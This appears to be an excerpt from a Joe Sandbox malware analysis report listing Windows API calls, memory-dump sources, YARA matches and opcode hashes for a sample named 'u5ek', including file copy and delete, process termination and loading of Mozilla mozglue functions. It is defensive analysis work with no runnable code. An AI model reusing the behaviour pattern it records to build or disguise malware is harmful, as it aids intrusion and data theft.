                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,6BB731A7), ref: 6BBACBF1
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000003,?,6BB731A7), ref: 6BBACBFA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                              • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                              • API String ID: 2429186680-2186867486
                                                                                                                                                                                                                              • Opcode ID: 79a2e9edb079ce9887075417cc3519c60eee98b1a92645b588b7491de5e940f5
                                                                                                                                                                                                                              • Instruction ID: 14fa30e58e0d702ed9650f9e5fcca6b6d9b321136bd3f0e2ad56c720f391968c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a2e9edb079ce9887075417cc3519c60eee98b1a92645b588b7491de5e940f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 15B092704043089BDB242BA4A80DB293B6DB709A01F000828A20183241CBBAE1008E61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6BB8237F
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00010000), ref: 6BB82B9C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                              • Opcode ID: 8485c6bc3ae5fa0b32f02e2ce96a59c3aa479f00fc9050786ed041f24e32b4ff
                                                                                                                                                                                                                              • Instruction ID: e1a4303cec3bbe63d0d0669984c2dd78cb37ec08a2b16d4564955286c65d7b4d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8485c6bc3ae5fa0b32f02e2ce96a59c3aa479f00fc9050786ed041f24e32b4ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67E17D71A002459FDB18CF69C8D0A9EBBB2FF88314F1981ADE9099B345D775EC85CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC9188
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC91BB
                                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,00000008,0000000F,?,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC91EB
                                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC9200
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6BBC8242,?,00000000,?,6BBBB63F), ref: 6BBC9219
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: malloc$freememcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4259248891-0
                                                                                                                                                                                                                              • Opcode ID: f77fbe491ff5012eb2fdee68bdcb5d969f640853d596d5f8f2991faa05b2fe03
                                                                                                                                                                                                                              • Instruction ID: c4e56332135a9d463fb6cab3aa2c50a42ddd5a183b7fdb3b539fd6857803e871
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f77fbe491ff5012eb2fdee68bdcb5d969f640853d596d5f8f2991faa05b2fe03
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5310031A00A458FFB01CF78DC4576BB3A9FF81209F414669D89ADB241EB35E845CBA2
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CBD1
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDE8
                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040CDFC
                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CE75
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                                              • Opcode ID: ce59c37605846a703ec7f329bf693d0e3fd4ec37542f7efc21b4330092dfbd7f
                                                                                                                                                                                                                              • Instruction ID: 6e212494759c8e3b152de70cf12e9653d7fde48daaab02ad2b76da051d612c4f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce59c37605846a703ec7f329bf693d0e3fd4ec37542f7efc21b4330092dfbd7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B914A729102049BCB14FBA1DC51EEE7739BF14304F51425EF51676491EF38AA89CBB8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTickCount64.KERNEL32 ref: 6BBD7250
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFF688), ref: 6BBD7277
                                                                                                                                                                                                                              • __aulldiv.LIBCMT ref: 6BBD72C4
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFF688), ref: 6BBD72F7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 557828605-0
                                                                                                                                                                                                                              • Opcode ID: 91e66e7386ca52eb2e3cfd1186aa2851b632f09a2944efe8d2b9d33f87217986
                                                                                                                                                                                                                              • Instruction ID: 283c3ecbfebf98a1751a72a0b231d7e38cc9f16233cb7b46890eeb7e8cd899d5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91e66e7386ca52eb2e3cfd1186aa2851b632f09a2944efe8d2b9d33f87217986
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59519F71E011699FCF08CFA9C890ABEBBB6FB89300F15862DD815A7350CB75A945CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBE3E4
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE3F1
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 6BBBE4AB
                                                                                                                                                                                                                                • Part of subcall function 6BB85D40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,?,?,?,6BBBD2DA,00000001), ref: 6BB85D66
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE4F5
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBBE577
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE584
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBE5DE
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000000), ref: 6BBBE6DA
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BBBE864
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BBBE883
                                                                                                                                                                                                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6BBBE8A6
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreememset$Xbad_function_call@std@@malloc
                                                                                                                                                                                                                              • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                                                                                                                                                                                                              • API String ID: 905598890-53385798
                                                                                                                                                                                                                              • Opcode ID: 7c5ecb92c803cf81561f219cebbe08c7965f4949ad302c53f1859d14e2ad35ff
                                                                                                                                                                                                                              • Instruction ID: 01aae91ff1080e2d45a043b08d38100b2927ece5c41df95f29164f900b692103
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c5ecb92c803cf81561f219cebbe08c7965f4949ad302c53f1859d14e2ad35ff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22419A74A0064ACFDB18CF28C490ABEB7B5FF4A304F0045ADD91A9B791DB79E855CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BBCDB86
                                                                                                                                                                                                                              • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6BBCDC0E
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBCDC2E
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBCDC40
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Impl@detail@mozilla@@Mutexfree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3186548839-0
                                                                                                                                                                                                                              • Opcode ID: 7cf3aeb40cd593aaa6743f5f16bb244a6a1830099721856558b1ea4cd3a5eeff
                                                                                                                                                                                                                              • Instruction ID: c953a429e425de60b91e99681e732998210dbfdee774786e464f23b988610587
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cf3aeb40cd593aaa6743f5f16bb244a6a1830099721856558b1ea4cd3a5eeff
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B54144796447408FC710CF34C498A6FBBF6EF88254F55886DE89A87351EB39E844CB52
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBCA315
                                                                                                                                                                                                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6BBCA31F
                                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?), ref: 6BBCA36A
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6BB95EDB
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: memset.VCRUNTIME140(6BBD7765,000000E5,55CCCCCC), ref: 6BB95F27
                                                                                                                                                                                                                                • Part of subcall function 6BB95E90: LeaveCriticalSection.KERNEL32(?), ref: 6BB95FB2
                                                                                                                                                                                                                                • Part of subcall function 6BBC2140: free.MOZGLUE(?,00000060,?,6BBC7D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC215D
                                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6BBCA37C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 700533648-0
                                                                                                                                                                                                                              • Opcode ID: da0396f2ab992e408aeb474f526704f47d2d775635b82d941f053639867550e4
                                                                                                                                                                                                                              • Instruction ID: d75bd057d7344285a7ae5b4c227963e79acbe6596bbf91c110713f6fcae3c3bd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da0396f2ab992e408aeb474f526704f47d2d775635b82d941f053639867550e4
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0210471A006649FCB01DF19D810B5FBBA8EF86754F054065EE099B301DB3AED02CAD7
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00415BEB
                                                                                                                                                                                                                                • Part of subcall function 00415450: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00415C1E,00000000), ref: 0041545B
                                                                                                                                                                                                                                • Part of subcall function 00415450: HeapAlloc.KERNEL32(00000000,?,?,00415C1E,00000000), ref: 00415462
                                                                                                                                                                                                                                • Part of subcall function 00415450: wsprintfW.USER32 ref: 00415478
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00415CAB
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415CC9
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00415CD6
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 396451647-0
                                                                                                                                                                                                                              • Opcode ID: fdfea1e36e01ba5dc6c08a707d84f87bfe87981db8c2dab46dee4399722e953d
                                                                                                                                                                                                                              • Instruction ID: 9bd26bda15b00488fb04890a05ea267a73874a1d1a12279ce6d54c29d70e7cb6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fdfea1e36e01ba5dc6c08a707d84f87bfe87981db8c2dab46dee4399722e953d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7311E71A00708DFDB24DFD0CD49BEDB775BB88304F204459E506AA284EB78AA85CF95
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,6BB956EE,?,00000001), ref: 6BB95B85
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95B90
                                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(6BBFF688,?,?,?,6BB956EE,?,00000001), ref: 6BB95BD8
                                                                                                                                                                                                                              • GetTickCount64.KERNEL32 ref: 6BB95BE4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CriticalSection$Count64CounterEnterLeavePerformanceQueryTick
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2796706680-0
                                                                                                                                                                                                                              • Opcode ID: 86e0900d66262c929458b4634007cc55f6454f211a452e27090c236696eece70
                                                                                                                                                                                                                              • Instruction ID: 725dcc7e93b41456e0c98fa6cf2da3bcf5083c5ff22d6a24fbb236152341cef6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 86e0900d66262c929458b4634007cc55f6454f211a452e27090c236696eece70
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 012191756057449FCB08DF68E45566EBBEAEF8E310F04C82EE99A87390DB71E804CB41
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6BBC1B98
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(?,?,6BBC1D96,00000000), ref: 6BBC1BA1
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(?,?,6BBC1D96,00000000), ref: 6BBC1BB5
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BBC1C25
                                                                                                                                                                                                                                • Part of subcall function 6BBC1C60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,6BBC759E,?,?), ref: 6BBC1CB4
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3699359333-0
                                                                                                                                                                                                                              • Opcode ID: 2c295c23ca413915016e28324a45ecd92536ff76e179f83a20291ad59f389489
                                                                                                                                                                                                                              • Instruction ID: dfd93c41c8d214068de21c6fb8033e77b877389f24935708907d48004fda609e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c295c23ca413915016e28324a45ecd92536ff76e179f83a20291ad59f389489
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F021C170A042A89BDB14DF26C48577FBBB9EF42744F080459E9167B242D7BDE801CB92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __aulldiv
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3732870572-0
                                                                                                                                                                                                                              • Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                                                                                                                                                              • Instruction ID: 82d2e6349a147f082f9eeb68154bbdbcde73b9edc352159363d6b0202f39c6cd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8211F71F006095FD714CF7DCC86E6B7BE8EB85714B10853EE45AD7250E678A8008BA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BB8BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BBD7A3F), ref: 6BB8BF11
